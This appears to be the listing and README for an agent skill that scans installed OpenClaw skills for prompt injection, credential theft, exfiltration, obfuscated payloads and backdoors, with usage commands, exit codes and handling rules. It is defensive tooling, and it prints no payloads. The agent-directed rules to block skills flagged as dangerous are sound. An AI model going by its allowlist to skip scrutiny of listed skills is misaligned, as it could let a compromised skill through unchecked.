Skill Defender

Data & APIs

Scans installed OpenClaw skills for malicious patterns including prompt injection, credential theft, data exfiltration, obfuscated payloads, and backdoors. Use when installing new skills, after skill updates, or for periodic security scans. Runs deterministic pattern matching — fast, offline, no API cost.

Install

openclaw skills install skill-defender

Skill Defender — Malicious Pattern Scanner

When to Run

Automatic Triggers

New skill installed — Immediately run scan_skill.py against it before allowing use
Skill updated — Re-scan after any file changes in a skill directory
Periodic audit — Run batch scan on all installed skills when requested

Manual Triggers

User says "scan skill X" → scan that specific skill
User says "scan all skills" → batch scan all skills
User says "security check" or "audit skills" → same as above

Scripts

`scripts/scan_skill.py` — Single Skill Scanner

Scans one skill directory for malicious patterns. Produces JSON or human-readable output.

`scripts/aggregate_scan.py` — Batch Scanner

Scans ALL installed skills and produces a single JSON report. Includes a built-in allowlist to reduce false positives from security-related skills, API skills, and other known-safe patterns.

How to Run

# Scan a single skill (human-readable)
python3 scripts/scan_skill.py /path/to/skill-dir

# Scan a single skill (JSON output)
python3 scripts/scan_skill.py /path/to/skill-dir --json

# Scan ALL installed skills (JSON aggregate report)
python3 scripts/aggregate_scan.py

# With custom skills directory
python3 scripts/aggregate_scan.py --skills-dir /path/to/skills

# With verbose warnings
python3 scripts/scan_skill.py /path/to/skill-dir --verbose

# Exclude false positives
python3 scripts/scan_skill.py /path/to/skill-dir --exclude "pattern1" "pattern2"

Exit Codes (scan_skill.py)

0 = clean or informational only
1 = suspicious (medium/high findings)
2 = dangerous (critical findings)
3 = error

Output Format (aggregate_scan.py)

{
  "skills": [
    {
      "name": "skill-name",
      "verdict": "clean|suspicious|dangerous|error",
      "findingsCount": 0,
      "findings": []
    }
  ],
  "summary": "All 37 skills passed with no significant issues.",
  "totalSkills": 37,
  "cleanCount": 37,
  "suspiciousCount": 0,
  "dangerousCount": 0,
  "errorCount": 0,
  "timestamp": "2026-02-02T06:00:00+00:00"
}

Auto-Detection

Both scripts auto-detect paths:

Skills directory: Detected from script location (walks up to find skills/ parent), falls back to ~/clawd/skills, ~/skills, ~/.openclaw/skills
Scanner script: aggregate_scan.py finds scan_skill.py co-located in the same directory

Handling Results

✅ Clean (`verdict: "clean"`)

No action needed — skill is safe

⚠️ Suspicious (`verdict: "suspicious"`)

Warn the user with a summary of findings
Show the category and severity of each finding

🚨 Dangerous (`verdict: "dangerous"`)

Block the skill — do not proceed with installation or use
Show the full detailed findings to the user
Require explicit user override to proceed

Built-in Allowlist

The aggregate scanner includes an allowlist for known false positives:

Security scanners (skill-defender, clawdbot-security-check) — their docs/scripts contain the very patterns they detect
Auth-dependent skills (tailscale, reddit, n8n, event-planner) — legitimately reference credential paths and API keys
Config-aware skills (memory-setup, eightctl, summarize) — reference config paths in documentation
Agent-writing skills (self-improving-agent) — designed to modify agent files

Pattern Reference

See references/threat-patterns.md for full documentation of all detected patterns, organized by category with explanations of why each is dangerous.

Important Notes

No external dependencies — standard library only (Python 3.9+)
Fast — under 1 second per skill, ~30 seconds for a full batch of 30+ skills
This is deterministic pattern matching (Layer 2 defense). Not LLM-based.
False positives are possible — the allowlist and --exclude flag help
The scanner will flag itself if scanned without the allowlist — this is expected